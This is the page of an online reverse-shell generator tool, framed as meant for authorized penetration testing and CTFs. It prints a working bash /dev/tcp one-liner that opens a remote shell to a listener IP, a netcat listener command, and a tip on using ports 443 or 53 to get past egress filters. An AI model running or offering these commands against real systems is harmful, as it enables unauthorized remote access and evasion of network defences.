Reverse Shell Generator
Enter your listener IP (LHOST) and port (LPORT) to get ready-to-copy reverse shell one-liners across Bash, Python, PHP, Perl, Ruby, PowerShell, Netcat and Socat, plus the matching listener command. For authorized testing and CTFs only.
How to use the reverse shell generator
- Enter the IP your listener runs on (LHOST) and the port to connect back to (LPORT).
- Start the listener on your machine, for example nc -lvnp 4444.
- Copy a one-liner and run it on the target you are authorized to test to catch the shell.
Examples
Bash /dev/tcp
LHOST 10.10.14.5, LPORT 4444
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
Frequently asked questions
Is this legal to use?
Only with explicit, written permission. This generator is for authorized penetration testing, CTFs and education. Never run these commands against systems you do not own or are not contracted to test, as unauthorized access is illegal.
What is a reverse shell?
A reverse shell is a connection that the target machine initiates back to your listener, giving you an interactive command line. Because the target dials out, it often slips past inbound firewall rules that would block a bind shell.
How do I choose a port (LPORT)?
Pick a port your listener can bind to and that the target is allowed to reach outbound. Common ports like 443 or 53 blend in with normal traffic and frequently get through egress filters; 4444 is a popular default for labs.
How do I catch the shell on the listener side?
Start a listener before running the payload. The simplest is Netcat: nc -lvnp 4444 listens on port 4444 and prints the shell when the target connects. The Listener section gives ncat, socat and Metasploit alternatives.
Are these commands sent to a server?
No. Every one-liner is built in your browser from the IP and port you type. Nothing is executed and no host is contacted by this tool.
Related tools
Nmap Command Builder
Build an nmap command from friendly options and get a plain-English explanation of every flag. For systems you own or are authorized to test.
Hash Identifier
Identify the likely hash algorithm of a string by its length, character set and prefix. Detects MD5, SHA, bcrypt and more. Runs in your browser.
Security Headers Analyzer
Paste raw HTTP response headers and get a graded report of your security headers, with severity ratings and copy-paste fixes. Runs in your browser.
Base64 Encode
Encode text to Base64 online. UTF-8 safe, handles emoji and accents, with an optional URL-safe (base64url) mode. Runs in your browser, nothing uploaded.
AES Encryption
Encrypt and decrypt text with AES-GCM and a password. Uses 256-bit keys derived with PBKDF2, runs entirely in your browser, and nothing is uploaded.
CSP Analyzer
Paste a Content-Security-Policy header and get it parsed into directives and audited for weaknesses, with severity and fixes. Runs in your browser.